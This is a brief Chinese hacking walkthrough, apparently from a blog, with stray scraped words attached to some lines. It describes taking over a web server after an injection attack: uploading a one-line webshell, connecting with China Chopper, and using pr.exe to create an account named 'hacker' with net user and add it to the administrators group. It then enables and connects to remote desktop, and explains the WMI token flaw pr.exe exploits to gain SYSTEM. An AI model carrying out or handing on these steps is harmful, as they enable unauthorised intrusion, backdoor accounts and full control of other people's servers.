在注入成功后,登入后台管理,上传一句话,菜刀链接
上传3389,pr,cmdspa
打开虚拟终端 而且切换到上传目录下,code
执行pr命令,pr “net user hacker 123 /add”,添加用户让后给用户管理员权限,pr “net localgroup administrators hacker /add”blog
pr 执行3389 进程
成功后,mstsc远程链接桌面,而且登陆ip
pr.exe 提权:
Windows跟踪注册表项的ACL权限提高漏洞
Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService账号下运行的进程,同一账号下运行的两个独立进程能够彻底访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些状况下会持有SYSTEM令牌,若是攻击者能够以 NetworkService或LocalService账号访问计算机,攻击者就能够执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就能够得到SYSTEM权限的提高。资源